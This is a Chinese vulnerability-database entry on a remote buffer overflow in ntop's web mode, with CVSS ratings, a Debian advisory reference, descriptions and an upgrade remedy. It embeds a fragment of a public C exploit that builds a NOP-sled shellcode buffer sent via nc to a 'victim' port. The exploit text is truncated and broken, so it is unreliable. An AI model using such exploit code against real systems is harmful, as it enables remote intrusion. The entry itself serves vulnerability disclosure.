发布时间 :2000-10-20 00:00:00
修订时间 :2008-09-10 15:05:40

[原文]Buffer overflows in ntop running in web mode allows remote attackers to execute arbitrary commands.



- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(VENDOR_ADVISORY)  DEBIAN  20000830 ntop: Still remotely exploitable using buffer overflows

- 漏洞信息

危急 缓冲区溢出
2000-10-20 00:00:00 2005-05-02 00:00:00

- 公告与补丁


- 漏洞信息 (20150)

Luca Deri ntop 1.2 a7-9/1.3.1 Buffer Overflow Vulnerability (EDBID:20150)
unix remote
2000-08-14 Verified
0 Anonymous
N/A [点击下载]

ntop is a network usage monitoring tool for unix systems. It can be invoked at the console or as a server daemon, presenting statistics information via http with the -w parameter. In this mode, it is vulnerable to a buffer overflow before the user connecting to it can be authenticated. If exploited, an attacker can gain remote access to the system with the priviliges ntop is executing with. 

It is interesting to note that setuid ntop drops priviliges before this can be exploited, but is installed on *BSD systems only executable by members of group wheel. This leads to the assumption that it may often be executed as root (since users in wheel typically have root access..), so despite the fact that it drops priviliges it can still yield remote root access for the attacker if exploited when run as root.

#include <stdio.h>
#include <string.h>

char shellcode[] =

void usage()
 printf("NTOP ntop-1.2a1 -w mode command execution exploit.\n");
 printf("                       \n");
 printf("Usage : ./ntop-w-exp | nc victim port\n");

void main( int argc, char *argv[] )
  int i,offset=-24;
#define CODE_LEN 240
#define NOP_LEN 50
  char code_buf[CODE_LEN];
  unsigned long esp=0xbedffb00;

  if(argc >= 2) offset = atoi(argv[1]);

  memset(code_buf,0x90,NOP_LEN); //insert NOP CODES
  memcpy(code_buf+NOP_LEN, shellcode, strlen(shellcode));
     *(long *)&code_buf[i]=(unsigned long)esp-offset;

  printf("GET /");
  for(i=0;i<CODE_LEN; i++)

- 漏洞信息

ntop -w Option Filename Buffer Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Third-party Verified

- 漏洞描述

A remote overflow exists in ntop when running in 'web server' (-w) mode. The program fails to validate input to the filename variable resulting in a buffer overflow. With a specially crafted request, an attacker can execute arbitrary code resulting in a loss of integrity.

- 时间线

2000-10-25 2000-08-14
2000-10-25 Unknow

- 解决方案

Upgrade to version 2.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者